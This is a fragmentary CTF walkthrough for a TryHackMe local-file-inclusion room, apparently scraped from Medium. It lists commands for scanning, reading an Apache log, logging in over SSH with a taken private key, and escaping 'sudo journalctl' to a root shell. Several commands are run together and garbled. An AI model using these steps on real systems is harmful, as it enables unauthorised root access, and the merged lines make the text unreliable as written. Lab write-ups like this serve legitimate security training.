TryHackMe: LFI

nmap -Pn <ip>
  1. Look around the website. What is the name of the parameter you found on the website?
/var/log/apache2/access.log
chmod 600 id_rsa
ssh -i id_rsa falcon@<ip>
lscat user.txt
  1. What can falcon run as root?
sudo -l
sudo journalctl!/bin/shid
cd /rootlscat root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store